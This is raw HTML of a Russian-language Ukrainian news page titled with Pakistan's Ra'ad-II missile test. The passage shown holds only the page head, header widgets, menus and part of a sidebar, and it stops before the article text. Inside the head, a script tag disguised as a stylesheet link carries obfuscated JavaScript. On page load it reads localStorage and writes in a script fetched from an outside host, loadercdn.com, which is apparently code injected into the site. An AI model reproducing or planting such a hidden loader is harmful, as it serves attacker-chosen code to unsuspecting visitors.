<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/02/1-553-640x427.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="640" /><meta property="og:image:height" content="427" /><meta property="og:image:alt" content="Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Крылатая ракета с дальностью полета 600 км значительно увеличивает возможности стратегического противодействия на суше и на море." /><meta property="og:description" content="Крылатая ракета с дальностью полета 600 км значительно увеличивает возможности стратегического противодействия на суше и на море." /><meta name="keywords" content="испытания,пакистан,ракета,новости технологий" /><link rel="canonical" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" /><meta property="og:url" content="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4795251';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4795251&amp;a=2866" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div class="container"> <div style="margin-top:100px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_abroad-ukr/full/2002-pakistan-uspishno-viprobuvav-yadernu-raketu-nosij-raad-ii">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>24.62</td><td>24.27</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>26.66</td><td>26.11</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>527.57</td><td>0.00</td><td>14:16 19.02.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1617.11</td><td>0.04</td><td>14:43 20.02.2020</td> </tr> <tr> <td>RTS</td><td>1548.90</td><td>0.44</td><td>14:43 20.02.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>59.37</td><td>+0.42</td><td style="text-transform:uppercase;">Feb</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2002-ukraincy-uzhe-zadeklarirovali-pochti-4-mlrd-griven-doxodov" title="Украинцы уже задекларировали почти 4 млрд гривен доходов"><img width="210" height="156" alt="Украинцы уже задекларировали почти 4 млрд гривен доходов" src="https://enovosty.com/wp-content/uploads/2020/02/95734.jpg"></a><a href="https://enovosty.com/news_economy/full/2002-ukraincy-uzhe-zadeklarirovali-pochti-4-mlrd-griven-doxodov" title="Украинцы уже задекларировали почти 4 млрд гривен доходов" class="name">Украинцы уже задекларировали почти 4 млрд гривен доходов <span>(704)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_society/full/2002-evakuirovannyx-iz-kitaya-ukraincev-otvezut-na-karantin-v-poltavskuyu-oblast-aleksandr-kachura-video" title="Эвакуированных из Китая украинцев отвезут на карантин в Полтавскую область, - Александр Качура (ВИДЕО)"><img width="210" height="156" alt="Эвакуированных из Китая украинцев отвезут на карантин в Полтавскую область, - Александр Качура (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/02/kachura1.jpg"></a><a href="https://enovosty.com/news_society/full/2002-evakuirovannyx-iz-kitaya-ukraincev-otvezut-na-karantin-v-poltavskuyu-oblast-aleksandr-kachura-video" title="Эвакуированных из Китая украинцев отвезут на карантин в Полтавскую область, - Александр Качура (ВИДЕО)" class="name">Эвакуированных из Китая украинцев отвезут на карантин в Полтавскую область, - Александр Качура (ВИДЕО) <span>(544)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_incidents/full/2002-v-seti-pokazali-posledstviya-ataki-rf-na-vsu-video" title="Земля пылала. В Сети показали последствия атаки РФ на ВСУ (ВИДЕО)"><img width="210" height="156" alt="Земля пылала. В Сети показали последствия атаки РФ на ВСУ (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/02/oskolok.jpg"></a><a href="https://enovosty.com/news_incidents/full/2002-v-seti-pokazali-posledstviya-ataki-rf-na-vsu-video" title="Земля пылала. В Сети показали последствия атаки РФ на ВСУ (ВИДЕО)" class="name">Земля пылала. В Сети показали последствия атаки РФ на ВСУ (ВИДЕО) <span>(3224)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/2002-qr-bilet-v-stolichnom-transporte-dlya-chego-on-nuzhen-i-kak-im-polzovatsya" title="QR-билет в столичном транспорте: для чего он нужен и как им пользоваться"><img width="210" height="156" alt="QR-билет в столичном транспорте: для чего он нужен и как им пользоваться" src="https://enovosty.com/wp-content/uploads/2020/02/image_810xs-1-1-e1582137817105.jpg"></a><a href="https://enovosty.com/news_kiev/full/2002-qr-bilet-v-stolichnom-transporte-dlya-chego-on-nuzhen-i-kak-im-polzovatsya" title="QR-билет в столичном транспорте: для чего он нужен и как им пользоваться" class="name">QR-билет в столичном транспорте: для чего он нужен и как им пользоваться <span>(1844)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/1902-v-ukraine-sushhestvennogo-sokratili-razmer-materialnoj-pomoshhi-voennosluzhashhim" title="В Украине существенного сократили размер материальной помощи военнослужащим"><img width="210" height="156" alt="В Украине существенного сократили размер материальной помощи военнослужащим" src="https://enovosty.com/wp-content/uploads/2020/02/unnamed-15.jpg"></a><a href="https://enovosty.com/news_society/full/1902-v-ukraine-sushhestvennogo-sokratili-razmer-materialnoj-pomoshhi-voennosluzhashhim" title="В Украине существенного сократили размер материальной помощи военнослужащим" class="name">В Украине существенного сократили размер материальной помощи военнослужащим <span>(3500)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1902-pobeda-za-pobedoj-bez-promaxov-i-porazhenij-vereshhuk-ob-otchete-kabmina-goncharuka-video" title="«Победа за победой, без промахов и поражений»: Верещук об отчете Кабмина Гончарука (ВИДЕО)"><img width="210" height="156" alt="«Победа за победой, без промахов и поражений»: Верещук об отчете Кабмина Гончарука (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/02/vereshchyk.jpg"></a><a href="https://enovosty.com/news_politics/full/1902-pobeda-za-pobedoj-bez-promaxov-i-porazhenij-vereshhuk-ob-otchete-kabmina-goncharuka-video" title="«Победа за победой, без промахов и поражений»: Верещук об отчете Кабмина Гончарука (ВИДЕО)" class="name">«Победа за победой, без промахов и поражений»: Верещук об отчете Кабмина Гончарука (ВИДЕО) <span>(1731)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1902-stalo-izvestno-skolko-zhilyx-domov-v-kieve-podlezhat-snosu-iz-za-avarijnogo-sostoyaniya" title="Стало известно, сколько жилых домов в Киеве подлежат сносу из-за аварийного состояния"><img width="210" height="156" alt="Стало известно, сколько жилых домов в Киеве подлежат сносу из-за аварийного состояния" src="https://enovosty.com/wp-content/uploads/2020/02/image_810xs-4-e1582109174683.jpg"></a><a 